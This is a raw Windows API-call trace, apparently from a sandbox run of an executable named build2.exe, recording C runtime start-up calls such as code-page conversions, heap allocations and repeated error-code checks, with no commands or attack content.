!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢çÜ\x15\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0117.265] GetLastError () returned 0x5 [0117.265] SetLastError (dwErrCode=0x5) [0117.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿኔ㣽ឿBĀ") returned 256 [0117.265] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿኔ㣽ឿBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0117.265] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿኔ㣽ឿBĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0117.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢çÜ\x15\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0117.266] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4458d0, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe")) returned 0x50 [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.266] SetLastError (dwErrCode=0x0) [0117.266] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.267] GetLastError () returned 0x0 [0117.267] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.268] GetLastError () returned 0x0 [0117.268] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.269] GetLastError () returned 0x0 [0117.269] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.270] SetLastError (dwErrCode=0x0) [0117.270] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.271] GetLastError () returned 0x0 [0117.271] SetLastError (dwErrCode=0x0) [0117.272] GetLastError () returned 0x0 [0117.272] SetLastError (dwErrCode=0x0) [0117.272] GetLastError () returned 0x0 [0117.272] SetLastError (dwErrCode=0x0) [0117.272] GetLastError () returned 0x0 [0117.272] SetLastError (dwErrCode=0x0) [0117.272] GetLastError () returned 0x0 [0117.272] SetLastError (dwErrCode=0x0) [0117.272] GetLastError () returned 0x0 [0117.272] SetLastError (dwErrCode=0x0) [0117.272] GetLastError () returned 0x0 [0117.272] SetLastError (dwErrCode=0x0) [0117.272] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.273] GetLastError () returned 0x0 [0117.273] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] GetLastError () returned 0x0 [0117.274] SetLastError (dwErrCode=0x0) [0117.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x59) returned 0x2b19b0 [0117.274] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.275] SetLastError (dwErrCode=0x0) [0117.275] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.276] GetLastError () returned 0x0 [0117.276] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.277] SetLastError (dwErrCode=0x0) [0117.277] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.278] SetLastError (dwErrCode=0x0) [0117.278] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.279] SetLastError (dwErrCode=0x0) [0117.279] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.280] SetLastError (dwErrCode=0x0) [0117.280] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.281] SetLastError (dwErrCode=0x0) [0117.281] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.282] GetLastError () returned 0x0 [0117.282] SetLastError (dwErrCode=0x0) [0117.283] GetLastError () returned 0x0 [0117.283] SetLastError (dwErrCode=0x0) [0117.283] GetLastError () returned 0x0 [0117.283] SetLastError (dwErrCode=0x0) [0117.283] GetLastError () returned 0x0 [0117.283] SetLastError (dwErrCode=0x0) [0117.283] GetLastError () returned 0x0 [0117.283] SetLastError (dwErrCode=0x0) [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x98) returned 0x2b1a18 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1f) returned 0x2b1ab8 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2b) returned 0x2b1ae0 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x37) returned 0x2b1b18 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2b1b58 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x31) returned 0x2b1ba0 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2b1be0 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2b1c00 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x14) returned 0x2b1c30 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xd) returned 0x2b1c50 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1a) returned 0x2b1c68 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2b1c90 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x19) returned 0x2b1cc8 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2b1cf0 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe) returned 0x2b1d10 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x95) returned 0x2b1d28 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3e) returned 0x2b1dc8 [0117.283] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2b1e10 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1d) returned 0x2b1e38 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2b1e60 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2b1eb0 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2b1ed0 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2b1ef0 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2b1f18 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x29) returned 0x2b1f48 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2b1f80 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6b) returned 0x2b1fa8 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2b2020 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xf) returned 0x2b2040 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2b2058 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2b2078 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x29) returned 0x2b20b0 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2b20e8 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x13) returned 0x2b2108 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1f) returned 0x2b2128 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2b2150 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2b2170 [0117.284] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x46) returned 0x2b2190 [0117.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2b11f8 | out: hHeap=0x2b0000) returned 1 [0117.285] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2b11f8 [0117.285] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2b21e0 [0117.285] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.285] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.286] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x428aeb) returned 0x0 [0117.286] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.286] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.286] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.287] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.287] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.287] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.287] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.287] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.289] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0117.289] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 